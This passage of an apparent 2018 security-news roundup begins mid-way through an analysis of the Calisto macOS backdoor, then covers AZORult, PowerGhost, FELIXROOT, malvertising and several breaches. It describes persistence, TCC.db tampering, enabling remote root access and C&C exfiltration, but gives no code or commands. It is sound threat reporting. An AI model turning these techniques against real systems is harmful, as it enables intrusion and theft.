Recall that Keychain stores passwords/tokens saved by the user, including ones saved in Safari. The encryption key for the storage is the user’s password.

Next, if SIP is enabled, an error occurs when the Trojan attempts to modify system files. This violates the operational logic of the Trojan, causing it to stop.

Error message

With SIP disabled/not available
Observing Calisto with SIP disabled is far more interesting. To begin with, Calisto executes the steps from the previous chapter, but as the Trojan is not interrupted by SIP, it then:

Copies itself to /System/Library/ folder
Sets itself to launch automatically on startup
Unmounts and uninstalls its DMG image
Adds itself to Accessibility
Harvests additional information about the system
Enables remote access to the system
Forwards the harvested data to a C&C server
Let’s take a closer look at the malware’s implementation mechanisms.

Adding itself to startup is a classic technique for macOS, and is done by creating a .plist file in the /Library/LaunchAgents/ folder with a link to the malware:

The DMG image is unmounted and uninstalled via the following command:

To extend its capabilities, Calisto adds itself to Accessibility by directly modifying the TCC.db file, which is bad practice and an indicator of malicious activity for the antivirus. On the other hand, this method does not require user interaction.

An important feature of Calisto is getting remote access to the user system. To provide this, it:

Enables remote login
Enables screen sharing
Configures remote login permissions for the user
Allows remote login to all
Enables a hidden “root” account in macOS and sets the password specified in the Trojan code
The commands used for this are:

Note that although the user “root” exists in macOS, it is disabled by default. Interestingly, after a reboot, Calisto again requests user data, but this time waits for the input of the actual root password, which it previously changed itself (root: aGNOStIC7890!!!). This is one indication of the Trojan’s rawness.

At the end, Calisto attempts to transfer all data from the .calisto folder to the cybercriminals’ server. But at the time of our research, the server was no longer responding to requests and seemed to be disabled:

Attempt to contact the C&C server

Extra functions
Static analysis of Calisto revealed unfinished and unused additional functionality:

Loading/unloading of kernel extensions for handling USB devices
Data theft from user directories
Self-destruction together with the OS

Loading/unloading of kernel extensions

Working with user directories

Self-destruction together with the entire system

Connections with Backdoor.OSX.Proton
Conceptually, the Calisto backdoor resembles a member of the Backdoor.OSX.Proton family:

The distribution method is similar: it masquerades as a well-known antivirus (a Backdoor.OSX.Proton was previously distributed under the guise of a Symantec antivirus product)
The Trojan sample contains the line “com.proton.calisto.plist”
Like Backdoor.OSX.Proton, this Trojan is able to steal a great amount of personal data from the user system, including the contents of Keychain
Recall that all known members of the Proton malware family were distributed and discovered in 2017. The Calisto Trojan we detected was created no later than 2016. Assuming that this Trojan was written by the same authors, it could well be one of the very first versions of Backdoor.OSX.Proton or even a prototype. The latter hypothesis is supported by the large number of unused and not fully implemented functions. However, they were missing from later versions of Proton.

To protect against Calisto, Proton, and their analogues:

Always update to the current version of the OS
Never disable SIP
Run only signed software downloaded from trusted sources, such as the App Store
Use antivirus software

DMG image: d7ac1b8113c94567be4a26d214964119
Mach-O executable: 2f38b201f6b368d587323a1bec516e5d

Advanced Malvertising Campaign Exploits Online Advertising Supply Chain
31.7.2018 securityweek
Exploit  Virus

Malvertising Campaign Steals Traffic From 10,000 Hacked WordPress Sites and Exploits the Online Advertising Supply Chain

Malvertising is neither a new nor insignificant threat -- nor is there any easy solution to stop it. It is the abuse of the online advertising industry to deliver malware disguised as or hidden within seemingly innocuous advertisements.

Researchers at Check Point have discovered what they describe as the infrastructure and methods used in a large ‘malvertising’ and banking Trojan campaign, which delivers malicious adverts to millions worldwide through the HiBids online advertising platform.

The campaign starts with a threat actor that Check Point describes as 'Master134'. He sold stolen web traffic from 10,000 hacked WordPress sites to, say the researchers, "AdsTerra, the real time bidding (RTB) ad platform, who then sold it to Resellers (ExoClick, AdKernel, EvoLeads and AdventureFeeds)."

The researchers told SecurityWeek, "The traffic is stolen from the compromised WordPress sites via a known exploit on that platform, which enables the actor to insert a redirection to his malicious infrastructure."

Once this traffic has passed through AdsTerra, the resellers sell it to the highest bidding advertiser. Unfortunately, the return value on malware distribution is (almost) immediate via malwares such as ransomwares, miners, and banking trojans. Due to the large return on those malwares, malicious actors can usually afford to out-bid legitimate publishers.

"In this way," say the researchers, "cyber criminals are abusing the online advertising ecosystem, using it to bid alongside legitimate advertisers, like Nike or Coca Cola, but placing higher bids in order to have the ad-networks select their malware-laden ads to display on thousands of publishers’ websites instead of clean, legitimate ads."

Check Point does not provide details of the malware being distributed through this particular campaign, nor any of the publications that receive and unwittingly transmit the malware to innocent visitors. It merely states, "The ads often contain malicious code that exploits unpatched vulnerabilities in browsers or browser plug-ins, such as Adobe’s Flash Player, so that the user gets infected by ransomware, keyloggers, and other types of malware simply by visiting a site hosting the malicious link."

Luis Corrons, security evangelist at Avast, told SecurityWeek that past malvertising campaigns "have affected some of the biggest news sites, such as The New York Times, Huffington Post, Forbes, The Daily Mail and more. In order to go undetected, some of these attacks just last a few seconds each wave, to make it harder to track the source of the infection. JavaScript Monero miner even got to YouTube through an ad network last January."

SecurityWeek asked AdsTerra for a comment on malvertising and the Check Point report, but we have so far received no reply to our email. Of the two telephone numbers we were able to find, one is a mobile number (supposedly in Singapore) that was switched off, while the other (supposedly in Gibraltar) just terminated. AdsTerra, according to its website, is headquartered in Limassol, Cyprus; while Europages lists an address in Gibraltar.

Online advertiser reviews, however, provide a glowing endorsement for the organization; with one saying that AdsTerra is particularly strong on popunder adverts. Popunders are among the sneakiest of advertisements. Rather than run the risk of being closed by the user as soon as it is seen, popunders open in a new window underneath the current browser window and remain unseen until the focus window is closed. "That’s one of the main streams of malvertising," Check Point told SecurityWeek.

There is no easy defense against malvertising. Ad blockers work, but more and more publishers are blocking access to their pages when they detect a blocker. Users must either pay a subscription for no adverts, accept they cannot view the page they want, or receive the adverts that could potentially contain malware or malicious links.

Greater responsibility -- perhaps even legal liability -- on the advertiser would help. Corrons suggests, "A content check should be performed by the ad network (on both the advertisements and the landing pages)." He would also like to see greater active monitoring, background checking on the publishers, and legal contracts with high fines if the content is not secure.

Little of this currently happens. "Due to the really fast transactions, and the sheer volume of advertisements, we believe that there is no real-time monitoring by humans," Check Point told SecurityWeek. "Resellers need to know that their customers are 'bad guys', but most of them preform no vetting of their customers."

Trusting to luck is not a good security defense; but it seems that the most many users can do against malvertising is use an ad blocker, maintain an up-to-date anti-virus solution, minimize local vulnerabilities with judicious patching -- and trust to luck when all else fails.

Samsung Patches Critical Vulnerabilities in SmartThings Hub

31.7.2018 securityweek Vulnerebility

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that allows for communications with Internet of Things devices deployed in the home using Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. Samsung has already released patches for all flaws and users are advised to update their devices to stay secure (because Samsung pushes the updates automatically and user interaction should not be necessary).

A new sophisticated version of the AZORult Spyware appeared in the wild

31.7.2018 securityaffairs Virus

A new sophisticated version of the AZORult Spyware was spotted in the wild, it was involved in a large email campaign on July 18
Malware researchers at Proofpoint spotted a new version of the AZORult Spyware in the wild, it was involved in a large email campaign on July 18, just 24 hours it appeared in cybercrime forums on the Dark Web.

Attackers sent out thousands of messages targeting North America. The messages used employment-related subjects such as “About a role” and “Job Application,” while the malicious attached documents used file names in the format of “firstname.surname_resume.doc”.

“AZORult is a robust information stealer & downloader that Proofpoint researchers originally identified in 2016 as part of a secondary infection via the Chthonic banking Trojan. We have since observed many instances of AZORult dropped via exploit kits and in fairly regular email campaigns as both a primary and secondary payload.” reads the analysis published by ProofPoint.

“Recently, AZORult authors released a substantially updated version, improving both on its stealer and downloader functionality.”

AZORult spyware

AZORult is a data stealer that was first spotted in 2016 by Proofpoint that discovered it was it was part of a secondary infection via the Chthonic banking trojan. Later it was involved in many malspam attacks, but only now the authors released a substantially updated variant.

The latest version appears more sophisticated than previous ones, it implements the ability to steal histories from browsers (except IE and Edge), it includes a conditional loader that checks certain parameters before running the malicious code, and includes the support for Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC cryptocurrency wallets.

Below the full change log:

UPD v3.2
[+] Added stealing of history from browsers (except IE and Edge)
[+] Added support for cryptocurrency wallets: Exodus, Jaxx, Mist, Ethereum, Electrum, Electrum-LTC
[+] Improved loader. Now supports unlimited links. In the admin panel, you can specify the rules for how the loader works. For example: if there are cookies or saved passwords from mysite.com, then download and run the file link[.]com/soft.exe. Also there is a rule “If there is data from cryptocurrency wallets” or “for all”
[+] Stealer can now use system proxies. If a proxy is installed on the system, but there is no connection through it, the stealer will try to connect directly (just in case)
[+] Reduced the load in the admin panel.
[+] Added to the admin panel a button for removing “dummies”, i.e. reports without useful information
[+] Added to the admin panel guest statistics
[+] Added to the admin panel a geobase
The conditional loader allows the attackers to infect only systems with specific characteristics, for example, it can check if certain desired cookies or saved passwords from specific sites are present on the victim’s machine,

After the malware has successfully connected the C&C server, it will send back to it the following files:

Next, after the initial exchange between the infected machine and the C&C server, the infected machine sends a report containing the stolen information. Again the report is XOR-encoded with the same 3-byte key; a portion of the decoded version is shown in Figure 5. The stolen information is organized into sections:

info: basic computer information such as Windows version and computer name
pwds: this section contains stolen passwords (not confirmed)
cooks: cookies or visited sites
file: contents of the cookies files and a file containing more system profiling information including machine ID, Windows version, computer name, screen resolution, local time, time zone, CPU model, CPU count, RAM, video card information, process listing of the infected machine, and software installed on the infected machine.
Once completed this phase, AZORult may download the next-stage payload.

The experts attributed the campaign to the TA516 threat actor that was focused on cryptocurrencies.

“As in legitimate software development, malware authors regularly update their software to introduce competitive new features, improve usability, and otherwise differentiate their products.” said ProofPoint.

“The recent update to AZORult includes substantial upgrades to malware that was already well-established in both the email and web-based threat landscapes. It is noteworthy that within a day of the new update appearing on underground forums, a prolific actor used the new version in a large email campaign, leveraging its new capabilities to distribute Hermes ransomware.”

Experts noticed that the infection process requests a significant users’ interaction to avoid antivirus. The victims would have to download the document that is password-protected, only after providing the password in a pop-up box included in the body of the email, the attack starts by requesting users to enable macros.

The macros download AZORult, which in turn downloads the Hermes 2.1 ransomware.

“AZORult malware, with its capabilities for credential and cryptocurrency theft, brings potential direct financial losses for individuals as well as the opportunity for actors to establish a beachhead in affected organizations,” concluded the experts.

Titan Security Keys- Google announced USB-based FIDO U2F Keys
31.7.2018 securityaffairs Crypto

Google will start offering Titan Security Keys to provide a further layer of security to its users and protect them from Phishing and MiTM attacks.
Google announced at Google Cloud Next ’18 convention in San Francisco the launch of the Titan Security Keys, a USB device that is used as part of its hardware-based two-factor authentication scheme for online accounts.

“Titan Security Key, available now to Cloud customers, and coming soon to the Google Store” states a blog post published by Google.

The hardware-based two-factor authentication scheme is designed to prevent account takeover with phishing and MiTM attacks when the attacker has gained access to user’s credentials.

Titan Security Keys

Google shared data related to the use of physical security keys by its personnel for months, the tech giant confirmed that none of its 85,000 employees that used the hardware-based two-factor authentication key has fallen victim to phishing attacks.

“We have had no reported or confirmed account takeovers since implementing security keys at Google” a Google spokesperson said.

“Users might be asked to authenticate using their security key for many different apps/reasons. It all depends on the sensitivity of the app and the risk of the user at that point in time.”

The authentication through the physical USB security key is more secure compared to other processes.

Titan Security Keys is based on the Fast IDentity Online (FIDO) Alliance, U2F (universal 2nd factor) protocol and was entirely designed by Google.

The Titan Security Key is available in both USB and Bluetooth versions, Google will offer it for sale in the Google’s online store within the next few months.

Log-in to Mobile devices will require a Bluetooth wireless device.

Google did not reveal the price for Titan Security Keys, but rumors say it will be available for around $20 or $30.

The Titan keys will be compatible with major browsers (i.e Chrome, Firefox, and Opera) and many online services, including Dropbox, Facebook, Github.

Fileless PowerGhost cryptocurrency miner leverages EternalBlue exploit to spread
31.7.2018 securityaffairs Cryptocurrency

Security experts from Kaspersky Lab have spotted a new cryptocurrency miner dubbed PowerGhost that can spread leveraging a fileless infection technique.
The PowerGhost miner targets large corporate networks, infecting both workstations and servers, it employing multiple fileless techniques to evade detection.

“The malware, which we dubbed PowerGhost, is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.” reads the analysis published by Kaspersky.

“This type of hidden consolidation is typical of miners: the more machines that get infected and the longer they remain that way, the greater the attacker’s profits. Therefore, it’s not uncommon to see clean software being infected with a miner; the popularity of the legitimate software serves to promote the malware’s proliferation.”

The PowerGhost leverages the NSA-linked EternalBlue exploit to spread, it is obfuscated PowerShell script containing malware’s core code, along with many other add-on modules such as the miner, miner libraries, the Mimikatz post-exploitation too, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

The victim system is infected remotely using exploits or remote administration tools (Windows Management Instrumentation), experts discovered that during the infection phase a one-line PowerShell script is executed to drop the core of the miner component and execute it, the entire process in the memory of the system.

The first thing that the malware does it to check the command and control (C&C) server and, if a new version is available, it downloads and executes it.

Then the malware uses the Mimikatz tool to get the user account credentials from the machine and use it to attempt lateral movements inside the target network.

“Propagation.With the help of mimikatz, the miner obtains the user account credentials from the current machine, uses them to log on and attempts to propagate across the local network by launching a copy of itself via WMI. By “a copy of itself” here and below we mean the one-line script that downloads the miner’s body from the C&C.” continues the analysis.

“PowerGhost also tries to spread across the local network using the now-notorious EternalBlue exploit (CVE-2017-0144).”

Once infected a machine, the PowerGhost attempts to escalate privileges by using various exploits such as the one for CVE-2018-8120.

In order to establish a foothold in the infected system, the PowerGhost saves all the modules as properties of a WMI class, while miner main body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes.

The script executes the miner by loading a PE file via reflective PE injection.

Most of the PowerGhost infections were observed in India, Brazil, Columbia, and Turkey.


Experts discovered also a PowerGhost version that implements DDoS capability, a circumstance that leads Kaspersky into believing that authors attempted to create a DDoS-for-hire service.

Further details, including Indicators of Compromise (IoCs) are reported in the analysis published by Kaspersky.

Stealthy Crypto-Miner Has Worm-Like Spreading Mechanism
30.7.2018 securityweek Cryptocurrency

The PowerGhost crypto-miner is capable of remaining undetected on infected systems, and can spread on its own by leveraging a fileless infection technique, Kaspersky Lab has discovered.

The miner is targeting both workstations and servers, which allows it to spread across large corporate networks. The threat, Kaspersky discovered, leverages the National Security Agency-linked EternalBlue exploit to spread.

The new threat proves once again that the growing popularity and rates of cryptocurrencies have determined cyber-criminals to adopt ingenious mining techniques and to gradually drop ransomware Trojans as the malware of choice in favor of crypto-miners.

PowerGhost is an obfuscated PowerShell script containing not only the malware’s core code, but also a series of add-on modules such as the miner and libraries required for the miner’s operation, Mimikatz, a module for reflective PE injection, and a shellcode for the EternalBlue exploit.

By employing multiple fileless techniques, the malware remains inconspicuous to the user and undetected by antivirus technologies, Kaspersky notes.

During infection, which is performed via exploits or remote administration tools (Windows Management Instrumentation), a one-line PowerShell script is executed to drop the miner’s body and immediately launch it, without writing it to the hard drive.

After that, the script, which is PowerGhost itself, checks the command and control (C&C) server and, if a new version is available, it fetches and runs it.

Mimikatz is used to get the user account credentials from the machine. Then, the malware logs on and attempts propagation on the local network by launching a copy of the initial script via WMI. The threat also attempts to spread leveraging the EternalBlue exploit (CVE-2017-0144).

After using Mimikatz and WMI to spread to a new machine, the malware also attempts to escalate privileges on the newly infected system using various exploits (including one for CVE-2018-8120).

All modules are saved as properties of a WMI class, while the miner’s body is saved as a one-line PowerShell script in a WMI subscription that activates every 90 minutes. The miner is launched via reflective PE injection.

One PowerGhost version also included the ability to launch distributed denial of service (DDoS) attacks, likely because its authors attempted to make extra money by offering DDoS services.

This DDoS function is the only one that copies files to the hard drive and Kaspersky's security researchers believe it will be replaced with a fileless implementation in a future version of the malware. The researchers believe the DDoS function was added to the malware, because it is launched in a peculiar manner, where the DDoS module and a function to launch it are downloaded and saved to the disk separately.

To date, PowerGhost was mainly observed within corporate local area networks and has been mainly encountered in India, Brazil, Columbia, and Turkey.

State of Email Security: What Can Stop Email Threats?
30.7.2018 securityweek Security

Neither Current Technology Nor Security Awareness Training Will Stop Email Threats

A survey of 295 professionals -- mostly but not entirely IT professionals -- has found that 85% of respondents see email threats bypass email security controls and make it into the inbox; 40% see weekly threats; and 20% have to take significant remediation action on a weekly basis.

Email security firm GreatHorn wanted to examine the state of email security today, nearly fifty years after email was first developed. Its findings (PDF) will not surprise security professionals. Breach analyses regularly conclude that more than 90% of all breaches start with an email attack. Indeed, the GreatHorn research shows that the majority (54.4%) of corporate security leaders (that is, those who hold the CISO role) consider email security to be a top 3 security priority.

What is surprising is not that email security is failing (almost half -- 46.1% -- of all respondents said they were less than 'satisfied' with their current email security solution), but the discrepancy in threat perception between the security professional respondents (comprising 61% of the sample) and the non-security respondents (the laypeople, comprising 39% of the sample).

"Sixty-six percent of all the people we interviewed said the only threat they saw in their inbox was spam," GreatHorn's CEO and co-founder Kevin O'Brien told SecurityWeek. "I suspect there is a little bit of a confluence of different things in this figure, and that when they say 'spam', they don't only mean unsolicited marketing emails. Nevertheless, it is a dismissal of the severity of the risk that email poses."

This figure changes dramatically when asked of the security professionals among the respondents. "When you narrow the interview stats to security professionals, less than 16% said that spam was the main threat they faced," he continued. "So, you have 85% of all security teams saying that there is a wide range of different kinds of threats that come in every single day via email -- but to the lay user, the only thing that ever goes wrong is that you get some email you don't want."

O'Brien also quoted statistics from Gartner email specialist Neil Wynne: "The email open rate for the average white-collar professional within the bounds of their work email is 100%," said O'Brien. "Whether or not you take any action in response to it, you will open the email."

It is true that you can open a malicious email and take no action whatsoever and you will remain safe. But that clearly doesn't happen. GreatHorn's figures show that 20% of the security professional respondents are forced into direct remediation from email threats (such as suspending compromised accounts, PowerShell scripts, resetting compromised third-party accounts, etc).

The implication, at a simplistic level, is that the average non-security member of staff is highly likely to open all emails; is not likely to expect anything other than spam (31% of the laypeople respondents said they never saw any email threats other than spam); and clearly -- from empirical proof -- will too often click on a malicious link or open a weaponized attachment.

Asked if a further implication from these figures is that security awareness training is failing, O'Brien said, "Yes." There are qualifications to this response, because phish training companies' built-in metrics clearly demonstrate an improvement in the click-thru rates for users trained with their systems. Reductions in successful phishing from a 30% success rate to just 10% is not uncommon.

But, said O'Brien, "Verizon has reported that one in 25 people click on any given phishing attack." This suggests that for every 100 members of staff targeted by a phishing email, four will become victims -- and only one is necessary for a breach to occur.

The difficulty is the nature of modern email attacks. Many involve some form of impersonation, including BEC attacks, business spoofing attacks, and pure social engineering attacks from a colleague whose credentials have been acquired by the attacker. "You cannot train people to have awareness of an email threat when information about that threat is not visible to the user. There is very little functional way to train a user to differentiate between an email from a colleague and an email from someone who has stolen the colleague's credentials. So, we have a security awareness market that has used marketing to say that email security is an awareness problem, a people problem, and that you can train your way out of it. You cannot."

He added, "The reason that security awareness training companies are successful is because awareness training represents a tick in a compliance box that clears a company of gross negligence in the event they suffer a data breach." So, despite the fact it isn't really effective, you still need to do it.

GreatHorn's own view of the problem is that the solution must come from not just technology, nor simply people, but from using technology against the social engineering aspect of the threat -- that is, the content as well as the mechanics of the email.

Belmont, Mass-based GreatHorn announced a $6.3 million Series A funding round led by Techstars Venture Capital Fund and .406 Ventures in June 2017. It brings machine-learning technology to the continuing threat and problem of targeted spear phishing and the related BEC threat -- the latter of which, according to the FBI in May 2016, is responsible for losses "now totaling over $3 billion."

Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek
Vulnerebility  Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.

Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch remote shell, terminate connection to the C&C, download and run batch script, download file, and upload file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.

DMARC Fully Implemented by Half of U.S. Government Agencies
30.7.2018 securityweek

More than half of U.S. government agencies have fully implemented the DMARC email security standard in response to a binding operational directive from the Department of Homeland Security, according to email threat protection company Agari.

The DHS issued the Binding Operational Directive (BOD) 18-01 in mid-October 2017, instructing all federal agencies to make plans and start using web and email security technologies such as HTTPS, STARTTLS and DMARC.

DMARC (Domain-based Message Authentication, Reporting and Conformance) is an email authentication, policy, and reporting protocol designed to detect and prevent email spoofing. Organizations can set the DMARC policy to “none” to only monitor unauthenticated emails, “quarantine” to send them to the spam or junk folder, or “reject” to completely block their delivery.

Agencies were given one year to fully implement DMARC (i.e. set their DMARC policy to “reject”).

Agari has been monitoring more than 1,000 government domains to check their status. Shortly after the DHS issued the BOD, only 18% had implemented at least a minimal DMARC policy. By December 2017, nearly half had rolled out DMARC, but only 16% had set a “quarantine” or “reject” policy.

Agari’s latest report shows that 922 government-owned domains, representing 81% of the total, had enabled DMARC as of July 15. Nearly 600, representing 52%, have set a “reject” policy.

DMARC status in U.S. federal agencies

While this may seem like significant progress, Agari pointed out that two-thirds of the domains with a “reject” policy are “defensive domains,” which are not configured for sending email.

“Moving defensive domains to a DMARC enforcement policy is generally an easier process than moving active domains that send email, and also need to account for 3rd parties sending email on the agency’s behalf as well as specific mail servers permitted to send email,” Agari said in its report.

The company has determined that 28 agencies have fully protected all their domains. Some government organizations still have some unprotected assets, but they have secured a significant number of domains.

For example, the Department of Health and Human Services has enabled DMARC with a “reject” policy on 92 of its 118 domains, while the Department of Justice has done so for 65 of its 75 domains.

“To fully reach compliance with BOD 18-01, and to protect the federal government from phishing attacks, many more executive branch agencies must still implement ‘p=reject.’ But in comparison to the private sector, the U.S. Government should serve as a shining example for the implementation of common security standards,” Agari said.

KICKICO security breach – hackers stole over $7.7 million worth of KICK tokens
30.7.2018 securityaffairs Incindent

ICO platforms are becoming a privileged target for hackers, the last victim in order of time is KickICO, a Blockchain crowdfunding website for ICO.
On Friday, KickICO disclosed a security breach, according to the platform attackers accessed to its wallets and stole over 70 million KICK tokens (roughly $7.7 million at the time).

The incident occurred on July 26, at 09:04 UTC, KickICO CEO Anti Danilevski explained that its staff learned of the security breach from victims who complained to it.


“On July 26 at 9:04 (UTC) KICKICO has experienced a security breach, which resulted in the attackers gaining access to the account of the KICK smart contract — tokens of the KICKICO platform. The team learned about this incident after the complaints of several victims, who did not find tokens worth 800 thousand dollars in their wallets.” reads the data breach notification published by the company.

As of Friday, the company announced the situation was under control and the smart contract has been restored. KickICO announced it will return all stolen KICK tokens to their legitimate owners, for this reason, it invited them to connect via email report@kickico.com.

“KICKICO guarantees to return all tokens to KickCoin holders. We apologize for the inconveniences,” Danilevski said.

The company quickly started an investigation on the security breach, the internal staff discovered that the attackers managed to gain access to the private key of the KickICO platform used by the developers to manage the KICK token smart contract.

Once obtained the key, the attackers used it to destroy KICK tokens at approximately 40 addresses and created the same amount of tokens at other 40 wallets he was controlling. Using this trick the overall number of tokens hasn’t changed and security measures in place were not able to detect the fraudulent activity.

“The hackers gained access to the private key of the owner of the KickCoin smart contract. In order to hide the results of their activities, they employed methods used by the KickCoin smart contract in integration with the Bancor network: hackers destroyed tokens at approximately 40 addresses and created tokens at the other 40 addresses in the corresponding amount. In result, the total number of tokens in the network has not changed. ” continues the notification.

Fortunately, the community quickly discovered the security breach and helped the platform to mitigate it. KICKICO quickly responded and prevented further losses by replacing the compromised private key with another one associated with the cold storage.

Read more: https://cryptovest.com/news/kickico-suffered-77m-hack-attack-says-will-return-stolen-kicko-tokens/

“After the incident, the KICK token, listed on the 136th position on Coinmarketcap, has lost 1.87% in the last 24 hours. However, the move may be influenced by the bearish mood of the entire crypto market after the SEC rejected a Bitcoin ETF proposed by the Winklevoss twins.” reported the website cryptovest.com.

Massive Singapore Healthcare Breach Possibly Involved Contractor
30.7.2018 securityweek Incindent

Researchers have come across two Pastebin posts that could shed more light on the data breach that resulted in the health records of 1.5 million Singaporeans getting stolen by hackers.

Authorities in Singapore announced on July 20 that a sophisticated threat actor had gained unauthorized access to a database of SingHealth, the city-state’s largest group of healthcare institutions.

The incident, described as Singapore’s biggest ever data breach, resulted in personal information and details on medication becoming compromised, but authorities said medical records, clinical notes and financial information were not affected.

The attackers are said to have used a malware-infected computer to access a SingHealth database between June 27 and July 4.

Singapore officials suggested – and independent cybersecurity experts confirmed – that the attack was likely carried out by a state-sponsored threat group, but they have refrained from publicly speculating on who might be behind the operation.

Trustwave has been monitoring the incident and the security firm is also convinced that the attack was launched by a nation-state actor.

“At this point, Trustwave SpiderLabs is not assigning attribution to a specific threat actor. We have strong suspicion but do not feel we have enough information to confirm attribution,” the company said.

Over the weekend, Trustwave published a blog post detailing its analysis of two files published by unknown individuals on code and text storage website Pastebin. While they have not been able to confirm it, researchers believe these files are somehow linked to the SingHealth breach and noted that they could provide important clues about how the attackers gained access to the data.

One of the files, an exception log from a Java server, posted to Pastebin on May 24, shows a query for delegating access to a SingHealth Headquarters (SHHQ) database from a senior manager in the Medical Technology Office of Singapore’s Health Services to an employee of CTC, a major IT contractor.

The delegation request was set for June 9 - 17 and it could mean that the attacker had hijacked the contractor’s user account and leveraged it to manipulate the SingHealth database. These dates show that the hackers may have conducted at least some reconnaissance activities weeks earlier than what Singapore officials reported.

The log file also shows that the target was a database named portaldev. “It is conceivable that the development environment server was not as well protected as the production server and therefore was an easier target,” Trustwave researchers said.

The security firm also discovered a series of SQL queries, targeting SingHealth medical data, uploaded to Pastebin on June 15. These queries suggest that whoever executed them was looking for sensitive information.

While it’s possible that the files were uploaded to Pastebin by developers working on the SingHealth database, they may have also been posted by the attacker, possibly to share code with collaborators for troubleshooting purposes, Trustwave explained.

“While we cannot know for certain if these findings are directly related to the SingHealth compromise, the combination of suspicious items occurring directly within the attack window are highly suspicious,” researchers said.

FELIXROOT Backdoor is back in a new fresh spam campaign

30.7.2018 securityaffairs Virus  Spam

Security experts from FireEye have spotted a new spam campaign leveraging the FELIXROOT backdoor, a malware used for cyber espionage operation.
The FELIXROOT backdoor was first spotted by FireEye in September 2017, when attackers used it in attacks targeting Ukrainians.

The new spam campaign used weaponized documents claiming to provide information on a seminar on environmental protection efforts.

The documents include code to exploit known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary.

Experts reported that the lure documents used in the last campaign were written in the Russian language. The weaponized document exploits the CVE-2017-0199 flaw to download a second-stage payload that triggers the CVE-2017-11882 vulnerability to drop and execute the final backdoor.

“FireEye recently observed the same FELIXROOT backdoor being distributed as part of a newer campaign. This time, weaponized lure documents claiming to contain seminar information on environmental protection were observed exploiting known Microsoft Office vulnerabilities CVE-2017-0199 and CVE-2017-11882 to drop and execute the backdoor binary on the victim’s machine.” reads the analysis published by FireEye.

“After successful exploitation, the dropper component executes and drops the loader component. The loader component is executed via RUNDLL32.EXE. The backdoor component is loaded in memory and has a single exported function,”

The CVE-2017-0199 allows the attackers to download and execute a Visual Basic script containing PowerShell commands when the victim opens the lure document.

The CVE-2017-11882 is remote code execution vulnerability that allows the attacker to run arbitrary code in the context of the current user.

FELIXROOT backdoor

This backdoor implements a broad a range of features, including the target fingerprinting via Windows Management Instrumentation (WMI) and the Windows registry, remote shell execution, and data exfiltration.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1.

If the backdoor was launched by RUNDLL32.exe with parameter #1 it makes an initial system triage before connecting to the command-and-control (C2). The malicious code uses Windows API to get the system information (i.e. computer name, username, volume serial number, Windows version, processor architecture and so on).

The FELIXROOT backdoor is able to communicate with its Command and Control server via HTTP and HTTPS POST protocols. The traffic to the C2 is encrypted with AES and converted into Base64.

“FELIXROOT communicates with its C2 via HTTP and HTTPS POST protocols. Data sent over the network is encrypted and arranged in a custom structure. All data is encrypted with AES, converted into Base64, and sent to the C2 server” continues the analysis.

“Strings in the backdoor are encrypt1ed using a custom algorithm that uses XOR with a 4-byte key.”

The experts believe that this backdoor is a dangerous threat but was involved at the time in massive campaigns.

FELIXROOT backdoor contains several commands that allow it to execute specific tasks. Once executed a command, the malicious code will wait for one minute before executing the next one.

“Once all the tasks have been executed completely, the malware breaks the loop, sends the termination buffer back, and clears all the footprints from the targeted machine” continues FireEye.

Deletes the LNK file from the startup directory.
Deletes the registry key HKCU\Software\Classes\Applications\rundll32.exe\shell\open
Deletes the dropper components from the system.
Further details, including the IoCs are reported in the analysis published by FireEye.

Underminer Exploit Kit spreading Bootkits and cryptocurrency miners
30.7.2018 securityaffairs Cryptocurrency

New Underminer exploit kit delivers a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.
Malware researchers from Trend Micro have spotted a new exploit kit, tracked as Underminer exploit kit, delivering a bootkit that infects the system’s boot sectors as well as a cryptocurrency miner dubbed Hidden Mellifera.

